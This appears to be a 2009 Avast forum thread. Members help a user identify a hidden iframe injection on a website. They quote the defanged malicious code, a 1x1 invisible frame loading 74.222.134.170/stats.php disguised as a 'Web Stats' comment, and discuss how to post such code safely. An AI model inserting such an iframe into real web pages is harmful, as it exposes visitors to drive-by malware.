Author Topic: Iframe-html and redirecting to another website on www.queenscentral.com  (Read 6219 times)

0 Members and 1 Guest are viewing this topic.

aj023

  • Guest
www.queenscentral.com is giving me an error saying there is an iframe-html virus and gives me a Network Shield: blocked access to malicious site 74.222.134.170/stats.php?id=2 [ C:\Program Files\Mozilla Firefox\firefox.exe ( 5056 ) ]

I spoke to the webmaster who doesn't know how to remove this virus or even know he has it and didn't know about it till I mentioned it. 

I contacted the abuse @ the above IP address who I gave info on this to and he tells me he doesn't see anything on his end and says he contacted the owner of the IP to check his server. 

Can someone verify if there is an IFRAME-HTML manipulation here and what is going on? 
« Last Edit: May 02, 2009, 10:12:52 AM by aj023 »

CharleyO

  • Guest
***

Welcome to the forums, aj023.   :)

I checked the source code of the link you supplied. Here is the offending iframe infection :

<eyeframe src=http://74.222.134.170/stats.php?id=2
(broken code)
width=1 height=1 frameborder=0></eyeframe>

I will post some of the other code before and after the iframe infection so it will be easier to find :

<p> </p>
<p>Here&#8217;s an <a href="hXXp://www.youtube.com/watch?v=-HazQlWgdzg" target="_blank">instructional video</a> to inform<!-- Web Stats --> <eyeframe src=http://74.222.134.170/stats.php?id=2
(broken code)
width=1 height=1 frameborder=0></eyeframe> <!-- End Web Stats --> you about pickpocketing.</p>
<p> </p>

You can now report this to the webmaster and include a link to this thread. Use this link :

http://forum.avast.com/index.php?topic=44842.msg375383#msg375383

(code broken between the "2" and "width.")

In the code above :

eyeframe = iframe

XX = tt


***
« Last Edit: May 03, 2009, 07:36:58 AM by CharleyO »

CharleyO

  • Guest
***

Information about IP address 74.222.134.170  :

https://safeweb.norton.com/report/show?name=74.222.134.170


***

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88895
  • No support PMs thanks
CharelyO, You have to be careful in posting the actual iframe tag as it could result in this page actually being pinged by avast, that is generally why I post images of the tags/code.

Break it over two lines, etc. change the http to hXXp as usual, change the < and > characters to ^ so it can't be interpreted by a browser as a legit code and possibly be actioned, e.g. ^iframe^ ^/iframe^

The placement of an iframe within a sentence is in its own right is suspect.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

CharleyO

  • Guest
***

OOPS ... thanks, David.    :-[

I will use images from now on.


***

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88895
  • No support PMs thanks
No problem, nice touch with changing it to eyeframe though; those who know will understand it is iframe ;D
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security